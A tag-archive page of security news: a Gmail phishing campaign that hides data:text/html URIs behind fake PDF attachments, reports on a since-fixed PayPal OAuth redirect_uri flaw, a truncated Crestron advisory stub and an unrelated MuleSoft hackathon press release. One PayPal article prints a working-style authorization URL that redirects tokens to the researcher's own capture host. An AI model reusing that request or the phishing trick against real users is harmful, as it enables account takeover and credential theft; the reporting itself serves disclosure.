Home Tags Uniform Resource Identifier (URI)

Tag: Uniform Resource Identifier (URI)

Brilliant phishing attack probes sent mail, sends fake attachments

Strategy_Doc.PDF from the next cubicle is actually a portal to p0wnage An newly-detected Gmail phishing attack sees criminals hack and then rifle through inboxes to target account owners' contacts with thoroughly convincing fake emails. The new attack uses the file names of sent attachments and applies that name into new attachments that appear to be PDFs but are actually images that, when clicked, send victims to phishing pages. Suitable subject lines stolen from sent emails are applied to the new phishing emails, making the mischievous messages more legitimate. Even the URL to which the attachments point is crafted to appear legitimate, bearing the google.com domain, says WordFence chief executive officer Mark Maunder who reported the attacks. "You are probably thinking you’re too smart to fall for this: It turns out that this attack has caught, or almost caught several technical users who have either tweeted, blogged or commented about it," Maunder says. "It is being used right now with a high success rate … this technique can be used to steal credentials from many other platforms with many variations in the basic technique." The phishing landing page.
Image: WordFence. Users who fall for the attacks can be saved by two factor authentication. One user claiming to be a system administrator at a school says the attacks compromised students and three staff within two hours, using an athletic schedule paired with a subject line to pull off the attacks. This is the closest I've ever come to falling for a Gmail phishing attack.
If it hadn't been for my high-DPI screen making the image fuzzy… pic.twitter.com/MizEWYksBh — Tom Scott (@tomscott) December 23, 2016 Attackers use the data URI scheme to embed a file in the browser location bar which executes once their malicious attachment is clicked, displaying the fake Google login page and google.com address. Keen eyed users may spot the URL prefix data:text/html or the lower resolution Google image in the phishing page. White space separates and hides the URL from the file text which invokes the phishing page in a new browser tab. Maunder says the phishing attacks do not trigger Google's green or red secure and insecure HTTPS security indicators, giving it an appearance of uniformity that makes the attacks highly effective. "In user interface design and in human perception, elements that are connected by uniform visual properties are perceived as being more related than elements that are not connected," he says. He recommends Google change the colour of the data:text/html prefix to amber which would grab user's attention. ® Sponsored: Customer Identity and Access Management

PayPal proffers patch for OAuth app hack hole

Payment giant takes second look at bad bugs. Paypal has patched a phishing vulnerability that could allow attackers to steal any OAuth token for its payment apps and gain access to accounts. Adobe software engineer and OAuth wonk Antonio Sanso discovered the token request flaw after messing with redirect URLs. He found PayPal's authorisation server setup to handle OAuth token requests via the developer Dashboard could be manipulated to accept localhost as a redirect_uri where tokens should be shipped. Sanso showcased the redirect_uri flaw by altering requests made by the Paypal OAuth demonstration app, which set the actual registered redirect_uri to https://demo.paypal.com/loginsuccessful&. https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid%20profile%20email%20address%20phone%20https://uri.paypal.com/services/paypalattributes%20https://uri.paypal.com/services/paypalattributes/business%20https://uri.paypal.com/services/expresscheckout&redirect_uri=https://demo.paypal.com/loginsuccessful&nonce=&newUI=Y He then inked a DNS entry for http://localhost.intothesymmetry.com to capture requests https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid%20profile%20email%20address%20phone%20https://uri.paypal.com/services/paypalattributes%20https://uri.paypal.com/services/paypalattributes/business%20https://uri.paypal.com/services/expresscheckout&redirect_uri=http://localhost.intothesymmetry.com/&nonce=&newUI=Y "So it really looks like that even if Paypal did actually perform exact matching validation, localhost was a magic word and it override the validation completely," Sanso says. PayPal squashed the bug earlier this month after initially deciding it was not a vulnerability in September. Sanso reported similar redirect_uri bugs to Facebook in 2014 to steal OAuth access tokens. He says developers using OAuth must register full exact redirect_uri addresses with no second stage redirects to protect their apps. ® Sponsored: Customer Identity and Access Management

PayPal Fixes OAuth Token Leaking Vulnerability

PayPal fixed an issue that could have allowed an attacker to hijack OAuth tokens associated with any PayPal OAuth application. The vulnerability was publicly disclosed on Monday by Antonio Sanso, a senior software engineer at Adobe, after he came across the issue while testing his own OAuth client. For its part, PayPal remedied the vulnerability about three weeks ago. The OAuth flaw, according to Sanso, stemmed from the token request and acquisition process. For starters, PayPal allows developers to create and edit their own apps through its developer application dashboard. After creating them, developers can register those apps and obtain an access token for them by sending a request to the company, which acts an authorization server. That  PayPal server could be overridden however, Sanso found. According to Sanso, the vulnerability stems from an error PayPal made when it implemented the OAuth. Developers with the company had set it up to accept localhost, the standard hostname given to the local computer a program is running, as redirect_url, the address used by OAuth providers to deliver access tokens, via browser redirect. After creating a DNS entry on his own site that mimicked localhost – http://localhost[.]intothesymmetry[.]com – Sanso found he could send a request to PayPal using that URL as the redirect_uri. It ultimately overrode the validation stipulated by PayPal and returned a PayPal OAuth client token. Sanso stressed to Threatpost that since it was universal, the trick could have worked for any PayPal OAuth client. Before the issue was fixed, he claims, he could’ve made an OAuth request using his redirect_uri and the client_id of any application to get an app’s authorization token sent to his server. PayPal began employing stricter redirect checks around the verification of the redirect_uri parameter in 2015 and uses exact matching to validate requests; but Sanso was still able to trick it with his own localhost subdomain. In this case ‘localhost’ was almost like a “magic word,” Sanso said. He told Threatpost that what an attacker would be able to do with the access tokens would depend largely on the scope of the access token and the OAuth flow. Sanso, who lives in Switzerland and co-authored a book on OAuth 2.0 last year, discovered the issue back in September but it took some prodding to get the issue resolved. Following a back and forth with the company – and radio silence for the month of October – PayPal informed Sanso on November 7 that it had fixed the issue. All your Paypal #OAuth tokens belong to me – localhost for the win – https://t.co/IW1Pg1KV2M pic.twitter.com/w05Ca2SRGN — Antonio Sanso (@asanso) November 28, 2016 The company did not immediately return a request for comment on Monday, but according to Sanso developers there fixed the issue by making it so the “PayPal Authorization Server no longer overrides the correct validation they had in place.” The way Sanso bypassed PayPal’s redirect_uri validations is similar to how Egor Homakov, a Russian researcher who went on to found the pen testing firm Sakurity, hacked GitHub in 2014. Through a series of OAuth bugs, Homakov found he could bypass validations in GitHub with a path traversal attack. Homakov found that every time he requested an authorization token, the provider responded with a valid access_token. Another bug he found could allow an attacker to hijack authorization code used for the redirect_uri. GitHub’s bug bounty program was in its infancy at the time, but it fixed those bugs and awarded Homakov with $4,000 for uncovering the vulnerabilities. Facebook has patched issues that hinged on how the site used OAuth over the years as well. In 2014 it fixed an issue that Sanso also discovered that allowed for bypass and stemmed from the improper validation of redirect_uri not validating correctly. Facebook patched a similar bug in 2013, dug up by Nir Goldshlager that relied on tricking victims into following a link. Goldshlager modified the URL string Facebook used for OAuth to get users to navigate to his own site and trigger an access token he stored there. Researchers with the University of Hong Kong highlighted a nasty flaw in OAuth 2.0 earlier this month at Black Hat Europe. A trio of academics said at the conference that poor OAuth implementations which allow for Facebook and Google single sign-on functionality can lead to account hijacking in one billion mobile apps.

VU#974424: Crestron Electronics DM-TXRX-100-STR web interface contains multiple vulnerabilities

Crestron Electronics DM-TXRX-100-STR web interface contains multiple vulnerabilities Original Release date: 01 Aug 2016 | Last revised: 01 Aug 2016 Overview Crestron Electronics DM-TXRX-100-STR, version 1.2866.00026 and earlier, has a web management ...

Barclays Launches Digital Banking Hackathon with MuleSoft

Barclays and MuleSoft Join Forces to Drive Innovation in Financial Services with APIsLONDON – July 20, 2016 – MuleSoft, provider of the leading platform for building application networks, today announced that it has partnered with Barclays to host a digital banking hackathon.

The hackathon will take place at Barclays Technology Centre Radbroke in Cheshire on July 20 and 21.

The event aims to foster innovation and harness technology to build a range of new financial services solutions. Peter Josse, UK chief information officer, Barclays, said, “We are thrilled to be joined by a number of our partners, including MuleSoft, to host our digital banking hackathon.

The ability to partner with other organisations to explore new and emerging digital banking technologies and APIs is critical in understanding how we can evolve new products and services for our customers and clients.” Unlocking the Potential of APIs in Financial ServicesAPIs are the building blocks used to define how data is accessed, exposed and shared across an application network. Hackathon participants will leverage Anypoint Platform™ and RAML (RESTful API Modeling Language) to develop digital-only banks, personalized products and services, and new banking experiences across mobile, tablet and television. Prior to the event, developers can take advantage of MuleSoft Champions Program’s unique online onboarding and learning environment to familiarize themselves with Anypoint Platform and RAML, review tutorials and gain access to various developer resources. With Anypoint Platform, organizations can build a seamless application network of applications, data and devices through API-led connectivity, whether in the cloud or on-premises.

By making any application, data or device pluggable and reusable, an application network enables financial services organizations to leverage existing and new technologies to drive innovation and agility at scale, launch new products and revenue opportunities, and improve customer experience. “Financial services organizations are in the midst of tremendous change, driven by regulatory and compliance pressures, increasing customer demands and the threat posed by new entrants.

This is driving organizations to re-evaluate what products and services they deliver and through which channels,” said Uri Sarid, CTO, MuleSoft. “We’re excited to work with Barclays to encourage new ways of thinking in banking by applying an API-led approach to connecting data, applications and devices in an application network, as well as leveraging RAML.

By harnessing the power of Anypoint Platform to build application networks and the simplicity of RAML to design good APIs, developers have the opportunity explore and create in an ecosystem primed for innovation and experimentation – and that ecosystem will persist and grow long after the hackathon.” Strong Customer Momentum in the Financial Services IndustryMuleSoft continues to see growing market demand from the financial services industry, as organizations in the space are recognizing that connectivity is critical to achieving their strategic initiatives, such as enriching consumer experiences, increasing operational efficiencies and delivering capabilities through digital channels.

Financial services customers include BBVA Banco Frances, Equity Insurance Group, Mastercard and Sagicor Life Insurance Company, as well as four of the top nine global banks and one of the top three global insurance companies. For more information about MuleSoft’s financial services solutions, visit: https://www.mulesoft.com/integration-solutions/soa/financial-services About Anypoint PlatformMuleSoft’s Anypoint Platform™ is a complete solution for API-led connectivity that creates a seamless application network of apps, data, and devices, both on-premises and in the cloud.

This hybrid integration platform includes iPaaS, ESB, and a unified solution for API management, design and publishing. About MuleSoftMuleSoft makes it easy to connect the world's applications, data and devices. With our market-leading Anypoint Platform™, companies are building application networks to fundamentally change the pace of innovation. MuleSoft’s API-led approach to connectivity gives companies new ways to reach their customers, employees and partners. Organizations in more than 60 countries, from emerging companies to Global 500 corporations, use MuleSoft to transform their businesses.

To find out how, visit http://mulesoft.com. MuleSoft is a registered trademark of MuleSoft, Inc.

All other marks are those of respective owners.
### Media ContactsVera WangMuleSoftpress@mulesoft.com415-920-3162 Jillian AlexanderSpeakeasy Strategies (PR for MuleSoft)jillian@speakeasystrategies.com+44 79 49 602 484